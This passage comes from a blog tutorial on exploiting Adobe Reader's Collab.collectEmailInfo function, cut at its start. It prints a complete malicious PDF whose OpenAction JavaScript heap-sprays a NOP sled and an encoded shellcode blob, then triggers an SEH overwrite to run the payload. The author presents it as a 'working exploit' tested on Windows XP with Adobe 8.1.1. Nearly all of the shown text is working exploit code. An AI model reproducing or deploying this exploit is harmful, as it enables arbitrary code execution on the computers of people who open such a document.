12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">}</pre></pre><pre>You can adjust the values 800000/2 and j<200 and test the exploit.</pre><pre>The following code is used to do a SEH overwrite which redirects the code to 0x0a0a0a0a on heap where our shellcode resides.</pre><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 516px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 105px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> crsh = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u0a0a%u0a0a</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">while</span> (crsh.<span style="color: #0000ff">length</span> < 0x4000)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> crsh += crsh;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">if</span> (app.viewerVersion >= 6.0)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> {<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000"></span>",msg: crsh});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> }</pre></pre><pre>Now the complete exploit code alltogether.</pre><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 521px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 196px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">%PDF-1.1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">1 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Catalog<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Outlines 2 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Pages 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /OpenAction 7 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">2 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Type /Outlines<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">3 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Pages<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Kids [4 0 R]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">4 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Page<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Parent 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /MediaBox [0 0 612 792]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Contents 5 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Resources <<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /ProcSet [/PDF /Text]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Font << /F1 6 0 R >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">5 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><< /Length 56 >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">stream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endstream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">6 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Font<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Subtype /Type1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Name /F1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /BaseFont /Helvetica<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Encoding /MacRomanEncoding<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Action<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /S /JavaScript<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /JS (<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">function</span> HeapSpray()<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">{<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">Array</span>2 = <span style="color: #0000ff">new</span> <span style="color: #0000ff">Array</span>();<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> Shellcode = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u3c73%u343f%u3514%u2a1c%ud6d2%ub624%u2c7c%ud538%ub8b5%uf533%u7e37%u7925%ue031%u9027%u19b2%u4be2%u4078%u097b%u71f8%u9948%ubf8d%u1d9f%u4315%u767d%u752d%u494e%u98b0%u727f%u7a76%ub30c%u8392%ue2d1%u3d7c%u91b9%u2270%u2ffc%ub2a8%u2c92%u4796%ua90d%u357b%ub49f%u98b0%u04b3%uf539%u46b8%uf929%u7d4f%u7315%ubf66%u778d%ub54a%u417e%ue319%u0243%ubbd5%ueb31%u781c%u9325%ube42%u9990%u2405%u103c%ud4d0%ufd84%u1879%u2be1%u74f8%u0827%u40d6%ub72d%ue009%u491d%u3771%u3fb1%u6748%u7534%ub64e%u9b0c%u3dba%u147c%u8797%ue1f7%u8c4b%u0ce2%u808d%u66f9%u404a%u2f3d%ue311%u277a%u2442%u38bf%u93fd%u25b4%u491c%u0191%u1df8%u9747%u4f71%u9048%u7e35%ub54e%u4bb8%u99b0%ud603%u373c%u78b2%u702c%ua843%u04b1%u85b6%u7deb%ufc6b%u7bb9%u6773%ub3a9%u7672%ube0d%u4115%u0534%u7492%uf512%ud50a%u7f79%u2175%u2de0%u9b9f%uff83%uc0c7%u77d4%u3f46%uba96%u98b7%u14bb%uba24%u7d2f%u4377%u7690%ubf3d%u728d%ufd30%u49b4%ub266%u89bb%ue2d2%u2570%ub09f%u3c78%ub840%u4e27%ue01a%u3746%ub12d%u4297%uf988%u7b04%u3579%u3275%uc6fe%ue3c1%uf869%u2873%u47eb%u4b7f%ub998%u3414%u9691%uf523%ufc13%u7a93%u9967%ud620%u051d%u74a8%u2271%u4ad4%u15a9%u484f%ud51b%u3fbe%ub6b3%u0cb7%ue181%u922c%u0d9b%u1c7c%u7eb5%u7341%u667a%u70be%u7974%u757b%ub737%ud33a%u9ff9%ub62f%u2598%u4034%u9067%u777f%uf60b%u1de3%u3993%u4ae2%u422d%u1571%u247e%u4792%ub5a8%u3fb0%u7d0c%ud62a%u86b1%ue0f7%u8d4f%ua943%u761c%u4e0d%u05bb%u3327%u46f5%u3d9b%u3c35%u3b72%u04f8%uf621%u4bd4%u41b8%u7897%ufd22%u9114%u7cb9%ufc03%ud186%u20eb%u49e1%ub3bf%u9699%u2cb4%u48b2%ud533%u7bba%u8366%u72e3%u7014%ud069%u98d4%u963c%u3f74%u7877%u737a%u8d49%u1941%u71e1%u0105%ub2f8%u4f4a%u0d7c%ud30a%u79eb%uf52b%u34b5%ube43%u97b7%u1c04%ub990%u2c35%u819f%uf9c1%u6b48%u93fc%u3775%u0c2f%ua9b3%u272d%u91ba%u7da8%u9225%u994e%ud584%ubb46%u761d%ub115%u1a7f%u42e0%ub647%u9bb8%ud631%u243d%ufd0b%ub0bf%ue211%ub467%u7e4b%u7c7b%u7e78%u7477%u9740%u109b%u05e3%ub13c%u85bb%u47d5%u6670%ub741%uf829%u3a72%u71eb%u2f7a%u7d46%u4875%u7fb9%u1d04%u894f%u37e0%u93b5%u7973%ufc3b%ub64e%u9298%u9f3f%ua9a8%ufd08%u1cbf%u144a%u340c%u322c%u2de1%ub296%uba67%u4976%uf502%u25be%u4b40%ue280%u9943%u7bb3%ue030%ub027%ub4b8%u7691%u7015%u7942%ud638%u3974%u35eb%ue288%u7c24%ud412%ud287%u0de3%u3d77%u908d%u1b71%u7ef9%uf528%u9966%u3c73%u922c%u2a72%u0df9%u4a4f%ud523%u187f%u7afd%u0935%u2fe1%ubb47%u48be%ub2b6%u7d91%u7805%ud413%ub8b0%u1475%u438d%u9634%u044b%u970c%u8cb9%u25d6%u1d90%u931c%u27ba%ub3bf%ua846%u24a9%uc041%u40f8%u153d%u4e42%ub49f%ub5b7%ufc3f%u492d%ub167%u9b98%uda37%ubace%ufdc9%u156d%u74d9%uf424%u2b58%ub1c9%u3133%u1750%u5003%u8317%uf909%ue08f%uea75%u0bd9%ueb85%u82b9%uda60%uf1eb%u4fe1%u713c%u63a7%ud7b7%uf753%uffb5%ub054%u2670%u415b%ue6b5%u8137%u9ad7%ud645%ua237%u2b86%ue339%uc4fa%ubc6b%u7671%uc99c%u4bc7%u1d9d%uf34c%u18e5%u8092%u225f%u39c2%u6ceb%u32fa%u4cb3%u97fb%ub1a7%u9cb2%u411c%u7545%uaa6d%ub974%u9522%u34b9%ud13a%ua77d%u2949%u5a7e%uea4a%u80fd%uefdf%u43a5%ud447%u8754%u9f1e%u6c5a%uc754%u737e%u73b9%uf87a%u543c%uba0b%u701a%u1850%u2102%ucf3c%u313b%ub098%u3999%ua40a%u6398%u3b40%u1e28%u3b2d%u2132%u541d%uaa03%u23f2%u799c%udcb7%u20d6%u7491%ub0bf%u18a0%u6f40%u24e6%u9ac3%ud296%ueedb%u9f93%u025b%ub0e9%u2409%ub05e%u471b%u2201%ua6c7%uc2a4%ub762</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">var</span> SprayValue = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u9090%u9090</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">do</span>{SprayValue +=SprayValue}<span style="color: #0000ff">while</span>(SprayValue.<span style="color: #0000ff">length</span> < 800000/2);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">for</span>(j=0;j<200;j++) <span style="color: #0000ff">Array</span>2[j]=SprayValue+Shellcode;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">}<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">HeapSpray();<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> crsh = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u0a0a%u0a0a</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">while</span> (crsh.<span style="color: #0000ff">length</span> < 0x4000)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> crsh += crsh;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">if</span> (app.viewerVersion >= 6.0)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> {<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000"></span>",msg: crsh});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> }<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">xref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000000 65535 f<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000012 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000109 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000165 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000234 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000439 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000553 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000677 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">trailer<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Size 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Root 1 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">startxref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">784<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">%%EOF<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre></pre><br /><p></p><br /><p></p><br /><p>And the calc pops up.</p><br /><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqR3OyVVo1uovMfjB6b6g42jiflLBEpsZjIHCSGPeIpu153XEnfiJ3CC4U7jmDLHIid_hMZZqQGbjux0101ZsvBa6HQ1sSMRUTJ8ATe9WL7GXGsN4VLIRn9wTiKSS4Tah-D9mQosC7bUax/s1600-h/image%25255B16%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="337" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDUlyoMueIxO4d7AVWR1JLRRpznsPRNTMx-1iprCi6ZUfpARoqDk_ywIvZDAvzXyidDnlXkeLsxVYt9rKbRtSYvADjc5RzagK27Q9t95dXlMf18OQOkIwdid9jxglL5p714I1XLLpV0M7x//?imgmax=800" width="515" border="0"></a> </p><br /><p>So here is our working exploit.</p><br /><p>Thanks to my friend Amit Malik who helped me to make the exploit reliable.</p><br /><p>Tried on tested on Windows XP SP2 adobe version 8.1.1 .</p><br /><p>references:<a title="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html" href="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html">http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html</a></p> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com6